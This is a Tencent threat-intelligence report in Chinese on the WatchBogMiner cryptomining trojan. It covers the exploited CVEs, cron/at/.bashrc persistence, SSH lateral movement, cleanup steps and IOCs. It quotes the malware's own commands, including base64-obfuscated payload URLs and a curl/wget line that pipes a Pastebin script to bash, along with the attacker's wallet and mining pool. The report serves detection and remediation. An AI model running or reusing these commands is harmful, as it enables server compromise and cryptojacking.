WatchBogMiner木馬利用漏洞攻擊傳播,已控制上萬臺Linux伺服器挖礦

長按二維碼關注

騰訊安全威脅情報中心

騰訊安全威脅情報中心檢測到針對Linux伺服器進行攻擊的WatchBogMiner變種挖礦木馬。該木馬利用Nexus Repository Manager、Supervisord、ThinkPHP等伺服器組件的遠程代碼執行漏洞進行攻擊，在失陷機器安裝多種類型的持久化攻擊代碼，然後植入門羅幣挖礦木馬進行挖礦。騰訊安全專家根據木馬使用的算力資源推測已有上萬臺Linux伺服器被黑客控制，已挖到28個門羅幣，收益約1.3萬元。

木馬通過第三方網站Pastebin保存惡意代碼以躲避檢測，並且通過各類方法進行持久化，定期拉取挖礦木馬加載到內存執行，同時會在啟動後刪除木馬文件以達到「隱身」目的。和其他挖礦木馬類似，WatchBogMiner木馬挖礦時，會清除其他挖礦木馬以獨佔伺服器。

WatchBogMiner變種攻擊代碼還會通過失陷機器已認證過的SSH RSA進行SSH連接和執行遠程命令進行橫向移動，以擴大其影響範圍。根據其錢包算力（120Kh/s）推測，木馬已控制約1萬臺伺服器進行挖礦。

騰訊安全專家建議企業網管對Linux伺服器進行安全檢測，及時清除挖礦木馬，及時修復伺服器組件存在的高危漏洞，避免遭遇更嚴重的損失，檢測方案可參考騰訊安全系列產品應對WatchBogMiner挖礦木馬的響應清單進行：

應用

場景

安全產品

解決方案

威

脅

情

報

騰訊T-Sec

威脅情報雲查服務

（SaaS）

1）WatchBogMiner黑產團夥相關IOCs已入庫。

各類安全產品可通過「威脅情報雲查服務」提供的接口提升威脅識別能力。可參考:https://cloud.tencent.com/product/tics

騰訊T-Sec

高級威脅追溯系統

1）WatchBogMiner黑產團夥相關信息和情報已支持檢索。

網管可通過威脅追溯系統，分析日誌，進行線索研判、追溯網絡入侵源頭。T-Sec高級威脅追溯系統的更多信息，可參考：https://cloud.tencent.com/product/atts

雲原生

安全

防護

雲防火牆

（Cloud Firewall，CFW）

基於網絡流量進行威脅檢測與主動攔截，已支持：

1）WatchBogMiner關聯的IOCs已支持識別檢測；

有關雲防火牆的更多信息，可參考：
https://cloud.tencent.com/product/cfw

騰訊T-Sec  主機安全

（Cloud Workload Protection，CWP）

1）已支持查殺WatchBogMiner相關木馬程序；

2）已支持Nexus Repository Manager 3 遠程代碼執行漏洞(CVE-2019-7238)檢測  ；

3）已支持Supervisord遠程命令執行漏洞(CVE-2017-11610)檢測；

4）已支持ThinkPHP遠程命令執行漏洞檢測。

 

騰訊主機安全（雲鏡）提供雲上終端的防毒殺毒、防入侵、漏洞管理、基線管理等。關於T-Sec主機安全的更多信息，可參考：https://cloud.tencent.com/product/cwp

騰訊T-Sec 漏洞掃描服務

（Vulnerability Scan Service，VSS）

1）騰訊VSS已支持檢測全網資產是否存在Nexus Repository Manager、Supervisord、ThinkPHP等伺服器組件高危漏洞；

 

關於騰訊T-Sec漏洞掃描服務的更多信息，可參考：https://cloud.tencent.com/product/vss

騰訊T-Sec 安全運營中心

基於客戶雲端安全數據和騰訊安全大數據的雲安全運營平臺。已接入騰訊主機安全（雲鏡）、騰訊御知等產品數據導入，為客戶提供漏洞情報、威脅發現、事件處置、基線合規、及洩漏監測、風險可視等能力。

關於騰訊T-Sec安全運營中心的更多信息，可參考：https://s.tencent.com/product/soc/index.html

非雲企業安全防護

騰訊T-Sec

高級威脅檢測系統

（騰訊御界）

基於網絡流量進行威脅檢測，已支持：

1）通過協議檢測WatchBogMiner木馬與伺服器的網絡通信；

關於T-Sec高級威脅檢測系統的更多信息，可參考：https://cloud.tencent.com/product/nta

騰訊T-Sec終端安全管理系統（御點）

1）可查殺WatchBogMiner團夥入侵釋放的木馬程序；

 

騰訊御點提供企業終端的防毒殺毒、防入侵、漏洞管理、基線管理等能力，關於T-Sec終端安全管理系統的更多資料，可參考：https://s.tencent.com/product/yd/index.html

更多產品信息，請參考騰訊安全官方網站https://s.tencent.com/

WatchBogMiner使用Nexus Repository Manager 3 遠程代碼執行漏洞(CVE-2019-7238)、Supervisord遠程命令執行漏洞(CVE-2017-11610)、ThinkPHP遠程命令執行漏洞的EXP代碼對伺服器進行掃描和攻擊，並通過Payload執行https[:]//pastebin.com/raw/1eDKHr4r。失陷機器被安裝的惡意定時任務如下：

為逃避檢測，攻擊者使用第三方網站Pastebin來保存惡意代碼，該網站不會被網絡防禦方判斷為惡意網站。WatchBogMiner變種用於存放惡意代碼的Pastebin帳號為"LISTTIME"，創建於2020年4月20日。

https[:]//pastebin.com/raw/1eDKHr4r跳轉https[:]//pastebin.com/raw/UhUmR517

「UhUmR517」上保存的內容經過base64解碼後，會得到以下shell腳本，包括有system()、cronhigh()、gettarfile()、download()、testa()、kill_miner_proc()等函數，會完成持久化、挖礦、橫向移動等功能，是該病毒的主要攻擊腳本。

腳本首先定義了4個變量，內容分別如下：

house=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3LzFlREtIcjRy|base64 -d)park=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L2I1eDFwUnpL|base64 -d)beam=$(echo c2FkYW42NjYueHl6OjkwODAvcnI=|base64 -d)deep=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L1NqaldldlRz|base64 -d)surf=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3R5am5UUVRB|base64 -d)

經過base64解碼後：
house= https[:]//pastebin.com/raw/1eDKHr4rpark= https[:]//pastebin.com/raw/b5x1pRzKbeam= sadan666.xyz:9080/rrdeep= https[:]//pastebin.com/raw/SjjWevTssurf= https[:]//pastebin.com/raw/tyjnTQTA

其中house、park、beam都會跳轉得到「UhUmR517」腳本，而deep、surf會返回函數名「dragon」和「lossl」。
 
持久化模塊通過多種方式定期執行遠程shell腳本：
1.system()函數通過寫入/etc/crontab文件，創建定時任務。
2.cronhigh()通過寫入以下文件創建定時任務。
/var/spool/cron/root/var/spool/cron/crontabs/root/etc/cron.d/system/etc/cron.d/apache/etc/cron.d/root/etc/cron.hourly/oanacroane/etc/cron.daily/oanacroane/etc/cron.monthly/oanacroane
3.cronlow()通過crontab命令創建定時任務。
4.cronbackup()通過at命令：echo "$pay" | at -m now + 1 minute添加定時任務，通過後臺隱藏執行一段帶有while循環的腳本："while true; do sleep 600 && $pay; done"，同樣達到定時任務效果。
5.cronc()通過寫入環境變量文件"/home/$me/.bashrc"、"/root/.bashrc"執行定時任務。
挖礦模塊為download()和testa()，分別從https[:]//pastebin.com/raw/GMdeWqec、
https[:]//pastebin.com/raw/Esctfgrx下載$mi_64和$st_64，經過解碼後得到XMRig、xmr-stak修改而成的挖礦程序，保存為：
/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/javaUpDates（最初被發現時該文件名為watchbog）
然後從https[:]//pastebin.com/raw/SB0TYBvG下載得到挖礦配置文件。
礦池：pool.minexmr.com:80
錢包：
48S8kPXdSgubJYsMhpRTr4Ct1nznDzV9ohNMEbmKzgeJLwWPV2QfKzsNRDYoxWWMAdTW69EVBhRQuFr7BiCsMQoU9xAKW4U

對比新版和舊版的挖礦木馬啟動代碼，發現新版代碼在釋放和啟動挖礦木馬之後，會sleep 15秒，然後通過rm -rf 命令將挖礦木馬文件刪除。

由於Linux系統進程啟動時，會將文件完全映射到內存中，所以啟動之後刪除文件不影響已經在運行中的進程，木馬用這一方法來抹掉文件痕跡從而達到隱身。木馬已通過各類持久化任務定期拉取挖礦木馬並加載到內存執行，即使每次執行後刪除文件，也能達到挖礦進程長期駐留系統的效果。
該錢包目前挖礦獲得門羅幣28XMR，折合人民幣13600元，礦池算力維持在120kH/s左右，這意味著持續有1萬臺左右的伺服器被控制挖礦。
腳本還會通過Kill_miner_proc()找到並清除競品挖礦木馬。
通過Kill_sus_proc()殺死高佔用CPU的可疑進程。
變種新增橫向移動模塊，獲取/root/.ssh/known_hosts中保存的已通過SSH RSA公鑰認證的IP，重新進行SSH登陸並執行遠程命令進行內網擴散攻擊：
curl -fsSL https[:]//pastebin.com/raw/UhUmR517||wget -q -O - https[:]//pastebin.com/raw/UhUmR517)|base64 -d|bash >/dev/null 2>&1 &
1、檢查是否有高CPU佔用的進程javaUpDates，kill掉該進程：
映像文件路徑（可能已被刪除）：
/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/javaUpDates

2、檢查以下文件是否有包含「sadan666.xyz:9080/rr」的定時任務，如有將其刪除：
/etc/crontab
/var/spool/cron/root
/var/spool/cron/crontabs/root
/etc/cron.d/system
/etc/cron.d/apache
/etc/cron.d/root
/etc/cron.hourly/oanacroane
/etc/cron.daily/oanacroane
/etc/cron.monthly/oanacroane

同時通過crontab命令檢查有無「sadan666.xyz:9080/rr」相關定時任務，如有將其刪除。

3、通過atq命令查找at任務隊列，刪除「sadan666.xyz:9080/rr」相關作業。

4、檢查是否存在進程/tmp/crun，如果該進程每10分鐘請求一次
「sadan666.xyz:9080/rr」，Kill掉該進程。

5、檢查配置文件"/home/$me/.bashrc"、"/root/.bashrc"是否包含「sadan666.xyz:9080/rr」相關內容，如有將其刪除。
IOCs
Domain
sadan666.xyz

IP
104.236.66.189

URL
https[:]//pastebin.com/raw/1eDKHr4r
https[:]//pastebin.com/raw/UhUmR517
https[:]//pastebin.com/raw/b5x1pRzK
http[:]//sadan666.xyz:9080/rr
https[:]//pastebin.com/raw/SjjWevTs
https[:]//pastebin.com/raw/tyjnTQTA
https[:]//pastebin.com/raw/Esctfgrx
https[:]//pastebin.com/raw/GMdeWqec
https[:]//pastebin.com/raw/SB0TYBvG
https[:]//pastebin.com/raw/Zkz0d9Jz
https[:]//pastebin.com/raw/mvSEGmR6

MD5
mi_64 88b658853b9ececc48f5cac2b7b3f6f6
st_64 ad17226de6cc93977fb7c22c7a27ea8e

錢包：
48S8kPXdSgubJYsMhpRTr4Ct1nznDzV9ohNMEbmKzgeJLwWPV2QfKzsNRDYoxWWMAdTW69EVBhRQuFr7BiCsMQoU9xAKW4U